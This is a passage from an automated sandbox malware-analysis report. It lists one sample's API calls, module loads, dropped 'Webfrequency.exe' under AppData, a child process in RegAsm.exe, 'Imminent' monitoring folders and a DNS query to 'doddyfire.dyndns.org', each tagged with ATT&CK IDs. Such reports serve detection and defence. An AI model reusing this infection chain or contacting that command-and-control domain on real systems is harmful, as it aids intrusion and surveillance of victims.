%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter WindowsCodecs.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00001812)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter sxs.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\CustomMarshalers\\0df8ec76525d72c37f86b6d2ab717e84\\CustomMarshalers.ni.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\CustomMarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\CustomMarshalers.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter Kernel32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter oleaut32 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter setupapi.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter msdmo.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter avicap32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll (UID: 00000000-00000352)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter WindowsCodecs.dll (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"100011000e036e6c@ADVAPI32.dll\"\n \"0d000e0022036e6c@ADVAPI32.dll\"\n \"0d000e00fe026e6c@ADVAPI32.dll\"\n \"0b000c00cc026e6c@ADVAPI32.dll\"\n \"10001100da026e6c@ADVAPI32.dll\"\n \"15001600c03e106d@ADVAPI32.dll\"\n \"0e000f00703f106d@ADVAPI32.dll\"\n \"0e000f00cc3f106d@ADVAPI32.dll\"\n \"11001200b447106d@ADVAPI32.dll\"\n \"110012004848106d@ADVAPI32.dll\"\n \"120013008c48106d@ADVAPI32.dll\"\n \"12001300e448106d@ADVAPI32.dll\"\n \"14001500386e106d@ADVAPI32.dll\"\n \"14001500506e106d@ADVAPI32.dll\"\n \"14001500686e106d@ADVAPI32.dll\"\n \"17001800806e106d@ADVAPI32.dll\"\n \"0d000e00986e106d@ADVAPI32.dll\"\n \"11001200a86e106d@ADVAPI32.dll\"\n \"11001200bc6e106d@ADVAPI32.dll\"\n \"0f001000fc6f106d@ADVAPI32.dll\"\n \"140015003c70106d@ADVAPI32.dll\"\n \"140015005470106d@ADVAPI32.dll\"\n \"0c000d009c70106d@ADVAPI32.dll\"\n \"0c000d00ac70106d@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Webdevelop (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002568)\n \"Webfrequency.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00001812)\n \"RegAsm.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Imminent (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Imminent\\Logs (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Imminent\\Monitoring (UID: 00000000-00000352)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"CreateProcessW\" with parameter \"\"%APPDATA%\\Webdevelop\\Webfrequency.exe\"\" - (UID: 00000000-00002568)\n \"Webfrequency.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" - (UID: 00000000-00001812)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"doddyfire.dyndns.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" has an executable section named \".text\"\n \"Webfrequency.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"amsi.dll\" - [base:0; Status:c0000135]\n 